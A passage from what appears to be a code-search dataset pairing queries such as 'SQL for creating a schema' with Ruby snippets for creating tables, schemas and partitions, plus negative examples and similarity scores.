Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? \"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_logical_replication_slot(name)\n typed_exec(\"SELECT pg_create_logical_replication_slot(#{connection.escape_literal(name)}, 'pgoutput')\")\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(size)\n disk_id = uuid\n sh \"zfs create -o reservation=1024 -o quota=1024 #{base}/#{disk_id}\"\n disk_id\n end",
"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def scaffold_table_name\n storage_name\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def set_partition(arg)\n if arg =~ /-/\n args = arg.split('-')\n arg1 = args[0]\n arg2 = args[1]\n else\n arg1 = arg\n arg2 = ''\n end\n\n partition = ''\n if arg1 == 'short' or arg1 == 's'\n partition = '-p tsl-short'\n elsif arg1 == 'med' or arg1 == 'm'\n partition = '-p tsl-medium'\n elsif arg1 == 'long' or arg1 == 'l'\n partition = '-p tsl-long'\n else\n warn \"incorrect queue. use either short or med or long queue\"\n exit\n end\n\n time = ''\n unless arg2 == ''\n number = /^(\\d+)\\w/.match(arg2)[1].to_i\n format = /^\\d+(\\w)/.match(arg2)[1].to_s\n if format == 'm' or format == 'mins'\n time = \"-t 00:#{number}:00\"\n elsif format == 'h' or format == 'hrs'\n time = \"-t #{number}:00:00\"\n elsif format == 'd' or format == 'days'\n time = \"-t #{number}-00:00:00\"\n else\n time = ''\n end\n end\n [partition, time]\nend",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_backup instance_id:, cluster_id:, backup_id:, source_table_id:, expire_time:\n backup = Google::Cloud::Bigtable::Admin::V2::Backup.new \\\n source_table: table_path(instance_id, source_table_id), expire_time: expire_time\n tables.create_backup parent: cluster_path(instance_id, cluster_id), backup_id: backup_id, backup: backup\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def make\n if dimension?\n dimension_key_builder\n elsif fact?\n FactKeyBuilder.new(staging_db[table.table_name])\n end\n end",
"def partition_edges\n\n par = RangePartition.new\n\n stateSet = @start_state.reachable_states\n\n stateSet.each do |s|\n s.edges.each {|lbl,dest| par.addSet(lbl) }\n end\n\n par.prepare\n\n stateSet.each do |s|\n newEdges = []\n s.edges.each do |lbl, dest|\n newLbls = par.apply(lbl)\n newLbls.each {|x| newEdges.push([x, dest]) }\n end\n s.clearEdges()\n\n newEdges.each do |lbl,dest|\n s.addEdge(lbl,dest)\n end\n end\n\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def DeletePartitionTable(disk, label)\n Builtins.y2milestone(\"DeletePartitionTable disk:%1 label:%2\", disk, label)\n label = DefaultDiskLabel(disk) if Builtins.isempty(label)\n ret = @sint.destroyPartitionTable(disk, label)\n if ret<0\n Builtins.y2error(\"DeletePartitionTable sint ret:%1\", ret)\n end\n UpdateTargetMap()\n ret == 0\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def add_key(name, type, clustering_order = nil)\n if @partition_key_columns.empty?\n unless clustering_order.nil?\n raise ArgumentError,\n \"Can't set clustering order for partition key #{name}\"\n end\n add_partition_key(name, type)\n else\n add_clustering_column(name, type, clustering_order)\n end\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table project_id:, dataset_id:, table_id:\n # [START bigquery_create_table]\n # project_id = \"Your Google Cloud project ID\"\n # dataset_id = \"ID of the dataset to create table in\"\n # table_id = \"ID of the table to create\"\n\n require \"google/cloud/bigquery\"\n\n bigquery = Google::Cloud::Bigquery.new project: project_id\n dataset = bigquery.dataset dataset_id\n\n table = dataset.create_table table_id do |updater|\n updater.string \"full_name\", mode: :required\n updater.integer \"age\", mode: :required\n end\n\n puts \"Created table: #{table_id}\"\n # [END bigquery_create_table]\nend",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def add_topic(topic, partitions=nil)\n if partitions.is_a? Integer\n partitions = (0..partitions - 1)\n end\n if partitions.nil?\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n -1\n )\n else\n partitions.each do |partition|\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n partition\n )\n end\n end\n end"
] |
[
"0.7089116",
"0.6901333",
"0.668798",
"0.6673402",
"0.6528554",
"0.64039016",
"0.62698126",
"0.62523615",
"0.6106679",
"0.60739046",
"0.6064444",
"0.6059633",
"0.60556954",
"0.6045033",
"0.60409546",
"0.59562093",
"0.5860424",
"0.5821033",
"0.5763657",
"0.57181513",
"0.569176",
"0.56453305",
"0.5538656",
"0.5506017",
"0.550334",
"0.549457",
"0.5482989",
"0.5389614",
"0.5327382",
"0.5311377",
"0.5272268",
"0.52684957",
"0.52538717",
"0.525012",
"0.52090627",
"0.5205005",
"0.51842576",
"0.51505214",
"0.5148609",
"0.51249045",
"0.5115734",
"0.5102319",
"0.5092358",
"0.505022",
"0.50295776",
"0.5004358",
"0.5002578",
"0.5001188",
"0.49937385",
"0.49874988",
"0.49870905",
"0.49844795",
"0.4970543",
"0.49648193",
"0.4958053",
"0.49575967",
"0.4941706",
"0.4936128",
"0.49317974",
"0.4928494",
"0.49182856",
"0.49092364",
"0.4902419",
"0.49008515",
"0.4899907",
"0.48941413",
"0.4886784",
"0.48851845",
"0.4855343",
"0.4854816",
"0.48539445",
"0.48405778",
"0.4819135",
"0.47995713",
"0.47910202",
"0.47898525",
"0.4787576",
"0.47829193",
"0.47703066",
"0.47696623",
"0.47689968",
"0.47530565",
"0.47484666",
"0.47373998",
"0.47262156",
"0.4721078",
"0.47162795",
"0.46932456",
"0.46831444",
"0.4678454",
"0.4661627",
"0.46614966",
"0.46603397",
"0.46585894",
"0.46544605",
"0.4651649",
"0.46501186",
"0.46456632",
"0.4642945",
"0.46394545"
] |
0.7671302
|
0
|
SQL for creating a schema.
|
def create_schema_sql(name, opts=OPTS)
"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{" AUTHORIZATION #{literal(opts[:owner])}" if opts[:owner]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
"def create_schema(schema)\n ActiveRecord::Base.connection.execute(\"CREATE SCHEMA #{schema}\")\n end",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_schema(schema_name, pg_username = nil)\n if pg_username.nil? # AR 4.0 compatibility - accepts only single argument\n execute \"CREATE SCHEMA #{schema_name}\"\n else\n execute(\"CREATE SCHEMA \\\"#{schema_name}\\\" AUTHORIZATION \\\"#{pg_username}\\\"\")\n end\n end",
"def create(schema,and_migrate = true)\n conn = ActiveRecord::Base.connection\n conn.execute(\"CREATE SCHEMA #{schema}\") unless conn.schema_exists? schema\n self.migrate(schema) if and_migrate\n end",
"def schema(schema_name, stream)\n stream << \" create_schema \\\"#{schema_name}\\\"\\n\"\n end",
"def add_schema(export_type = nil)\n mig_text = schema_generator_script(db_migration_schema, 'create')\n write_db_migration mig_text, \"#{db_migration_schema}_schema\", export_type: export_type\n end",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def schema(path = nil)\n s = \"ActiveRecord::Schema.define do\\n\"\n s << \" create_table \\\"#{File.basename(@data.path, \".*\")}\\\" do |t|\\n\"\n columns.each do |column|\n s << \" t.column #{column.schema_definition}\"\n end\n s << \" end\\nend\"\n \n if path\n File.open(path, 'w') {|f| f.puts(s)}\n end\n \n s\n end",
"def create_schema\n PgTools.create_schema id unless PgTools.schemas.include? id.to_s\n end",
"def create_db_schema(connection)\n connection.execute 'CREATE TABLE documents (id INTEGER PRIMARY KEY AUTOINCREMENT, name)'\n connection.execute 'CREATE TABLE words (id, doc_id, value)'\n connection.execute 'CREATE TABLE characters (id, word_id, value)'\nend",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def create_schema(args={})\n args[:force] ||= false\n\n ActiveRecord::Schema.define do\n create_table :users, force: args[:force] do |t|\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :password, limit: 256, null: true\n t.text :vcard, null: true\n end\n add_index :users, :jid, unique: true\n\n create_table :contacts, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :ask, limit: 128, null: true\n t.string :subscription, limit: 128, null: false\n end\n add_index :contacts, [:user_id, :jid], unique: true\n\n create_table :groups, force: args[:force] do |t|\n t.string :name, limit: 256, null: false\n end\n add_index :groups, :name, unique: true\n\n create_table :contacts_groups, id: false, force: args[:force] do |t|\n t.integer :contact_id, null: false\n t.integer :group_id, null: false\n end\n add_index :contacts_groups, [:contact_id, :group_id], unique: true\n\n create_table :fragments, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :root, limit: 256, null: false\n t.string :namespace, limit: 256, null: false\n t.text :xml, null: false\n end\n add_index :fragments, [:user_id, :root, :namespace], unique: true\n end\n end",
"def create_database_schema!\n \n if file_format.class.const_defined?('Database')\n @orm_module = file_format.class.const_get('Database')\n else\n @orm_module = file_format.class.const_set('Database', Module.new)\n end\n\n create_request_table_and_class\n create_warning_table_and_class\n \n file_format.line_definitions.each do |name, definition|\n create_database_table(name, definition)\n create_activerecord_class(name, definition)\n end\n end",
"def create_schema\n Apartment::Database.create(subdomain)\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def initialize_db_schema\n @db.exec(\n 'create table if not exists nodes\n (\n id SERIAL PRIMARY KEY,\n host VARCHAR(256) UNIQUE,\n last_seen TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n current_report INTEGER\n );\n\n create table if not exists collections\n (\n id SERIAL PRIMARY KEY,\n collection VARCHAR(256) NOT NULL,\n archived BOOL DEFAULT FALSE\n );\n\n create table if not exists reports\n (\n id SERIAL PRIMARY KEY,\n node_id INTEGER NOT NULL,\n file_handle INTEGER,\n status INTEGER NOT NULL,\n collection INTEGER NOT NULL,\n time TIMESTAMP NOT NULL,\n resources_changed INTEGER NOT NULL,\n resources_failed INTEGER NOT NULL,\n resources_total INTEGER NOT NULL,\n runtime REAL NOT NULL,\n new_report BOOL DEFAULT FALSE,\n FOREIGN KEY (node_id) REFERENCES nodes (id),\n FOREIGN KEY (collection) REFERENCES collections(id)\n );\n\n create table if not exists schemaversion\n (\n id SERIAL PRIMARY KEY,\n complete BOOL DEFAULT FALSE,\n comment VARCHAR(256) NOT NULL\n );\n create table if not exists reportdata\n (\n id SERIAL PRIMARY KEY,\n report bytea\n );\n '\n )\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def init_schema\n ActiveRecord::Schema.define do\n create_table :cars, :force => true do |t|\n t.column :brand, :string\n t.column :model, :string\n end\n\n create_table :passengers, :force => true do |t|\n t.column :car_id, :int\n t.column :name, :string\n end\n end\n\n Car.create!(\n :brand => \"Mazda\",\n :model => \"Protege\"\n )\nend",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create_schema schema_id, type, definition, options = {}\n schema = Google::Cloud::PubSub::V1::Schema.new(\n type: type,\n definition: definition\n )\n schemas.create_schema parent: project_path(options),\n schema: schema,\n schema_id: schema_id\n end",
"def user_defined_schemas(stream)\n return if (list = (@connection.user_defined_schemas - ['public'])).empty?\n\n stream.puts \" # Custom schemas defined in this database.\"\n list.each { |name| stream.puts \" create_schema \\\"#{name}\\\", force: :cascade\" }\n stream.puts\n end",
"def schema\n schema = Schema.new\n\n for name in db.tables\n next if IGNORED_TABLES.include? name\n table = schema.add_table( name )\n import_table( table )\n end\n\n schema\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def initialize_schema!\n Schema.create(self)\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def prepare_schema\n tables = [];ActiveRecord::Base.connection.execute(\"show tables\").each{|t| tables << t[0].strip}\n \n ActiveRecord::Schema.define do\n App.log.info(\"preparing schema\")\n \n unless tables.include?(\"services\")\n # a service entry\n begin\n create_table :services do |t|\n t.string :name\n t.string :status, :null => false, :default => \"active\"\n end\n add_index :services, :name\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"queries\")\n begin\n # queries\n create_table :queries do |t|\n t.string :query \n t.column :last_twid, :bigint, :null => false, :default => 0\n t.timestamp :last_run\n t.integer :last_result_count\n t.string :status, :default => 'active', :null=> false\n end\n add_index :queries, :query\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"tweets\")\n begin\n # cache of tweets\n create_table :tweets do |t|\n t.column :twid, :bigint, :null => false\n t.string :from_user\n t.string :to_user\n t.integer :from_user_id\n t.integer :to_user_id\n t.string :text\n t.string :profile_image_url\n t.timestamp :created_at\n end\n add_index :tweets, :twid\n rescue\n App.log_exception\n end\n end\n \n end # define schema\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
